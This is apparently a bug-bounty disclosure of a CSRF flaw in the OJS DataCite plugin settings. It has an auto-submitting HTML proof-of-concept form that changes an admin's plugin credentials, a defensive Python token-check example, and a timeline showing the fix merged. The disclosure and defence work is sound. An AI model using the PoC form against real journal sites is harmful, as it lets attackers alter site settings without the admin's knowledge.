Cross-Site Request Forgery (CSRF) in pkp/ojs

Status: Valid

Reported on: Oct 16th 2021

Description

No CSRF token in DataCite save settings plugin (OJS only)

POC

```html
<html>
  <body>
    <form action="http://10.0.2.15:8000/index.php/e/$$$call$$$/grid/settings/plugins/settings-plugin-grid/manage?plugin=DataciteExportPlugin&category=importexport&verb=save" method="POST">
      <input type="hidden" name="username" value="" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="testUsername" value="" />
      <input type="hidden" name="testPassword" value="" />
      <input type="hidden" name="testDOIPrefix" value="" />
      <input type="hidden" name="submitFormButton" value="" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
# Impact
This vulnerability can be used to trick a logged-in admin into changing the settings of the OJS DataCite plugin.
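The PoC above works because the settings-save handler accepts any POST that arrives with the admin's session cookie, without checking for a token the attacker's page cannot know. The following is an added example, not OJS or pkp code, that models the defence a handler like this needs: a per-session synchronizer token embedded in the legitimate form and checked with a constant-time compare before anything is saved, plus an Origin/Referer allow-list as defence in depth. The field name `csrfToken`, the `Session`/`Request` classes and the forged request are constructed for the illustration and assume nothing about OJS internals.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Constructed model of a server-side session. The CSRF token lives here,
# tied to the session, and is never readable by a page on another origin.
@dataclass
class Session:
    user_id: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))

# Constructed model of an incoming HTTP request (hypothetical, not OJS's Request).
@dataclass
class Request:
    method: str
    form: Dict[str, str]
    headers: Dict[str, str]
    session: Optional[Session]  # None if no valid session cookie was sent

SETTINGS_FIELDS = ("username", "password", "testUsername", "testPassword", "testDOIPrefix")

def render_csrf_field(session: Session) -> str:
    """Hidden input the legitimate settings page embeds; a cross-site page cannot read it."""
    return f'<input type="hidden" name="csrfToken" value="{session.csrf_token}" />'

def check_csrf(request: Request, allowed_origins: Tuple[str, ...]) -> Tuple[bool, str]:
    """Decide whether a state-changing request may proceed. Returns (ok, reason)."""
    if request.method not in ("POST", "PUT", "PATCH", "DELETE"):
        return True, "safe method"
    if request.session is None:
        return False, "no session"
    submitted = request.form.get("csrfToken", "")
    # hmac.compare_digest avoids leaking the token through timing differences.
    if not submitted or not hmac.compare_digest(submitted, request.session.csrf_token):
        return False, "missing or invalid csrfToken"
    # Defence in depth: browsers send Origin (or at least Referer) on cross-site form posts.
    source = request.headers.get("Origin") or request.headers.get("Referer", "")
    if source and not any(source.startswith(o) for o in allowed_origins):
        return False, "cross-site origin"
    return True, "ok"

def save_plugin_settings(request: Request, store: Dict[str, Dict[str, str]],
                         allowed_origins: Tuple[str, ...]) -> Tuple[int, str]:
    """Hardened handler: refuse to touch settings unless the CSRF check passes."""
    ok, reason = check_csrf(request, allowed_origins)
    if not ok:
        return 403, reason
    store[request.session.user_id] = {k: request.form[k] for k in SETTINGS_FIELDS if k in request.form}
    return 200, "saved"

def demo() -> Tuple[Tuple[int, str], Tuple[int, str]]:
    """Run a forged request shaped like the PoC and a legitimate one; return both outcomes."""
    allowed = ("http://journal.example",)  # constructed origin for the illustration
    store: Dict[str, Dict[str, str]] = {}
    admin = Session(user_id="admin")

    # Forged request: the admin's cookie rides along, but the attacker's form carries no token
    # and the browser stamps it with the attacker's origin.
    forged = Request(method="POST",
                     form={f: "" for f in SETTINGS_FIELDS} | {"submitFormButton": ""},
                     headers={"Origin": "http://attacker.example"},  # constructed
                     session=admin)
    forged_result = save_plugin_settings(forged, store, allowed)

    # Legitimate request: the token from render_csrf_field() is posted back from the real form.
    legit = Request(method="POST",
                    form={"username": "datacite-user", "password": "s3cret", "testDOIPrefix": "10.1234",
                          "csrfToken": admin.csrf_token},
                    headers={"Origin": "http://journal.example"},
                    session=admin)
    legit_result = save_plugin_settings(legit, store, allowed)
    return forged_result, legit_result

if __name__ == "__main__":
    print(demo())
```

The first tuple returned by `demo()` is the forged request's outcome (403, settings untouched); the second is the legitimate save (200). Checking `Origin` alone is not sufficient, since some clients and privacy extensions strip it, which is why the token check is the primary control and the origin check only a backstop.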
We have contacted a member of the pkp/ojs team and are waiting to hear back a month ago
Alec Smecher validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 41a389 a month ago
Alec Smecher has been awarded the fix bounty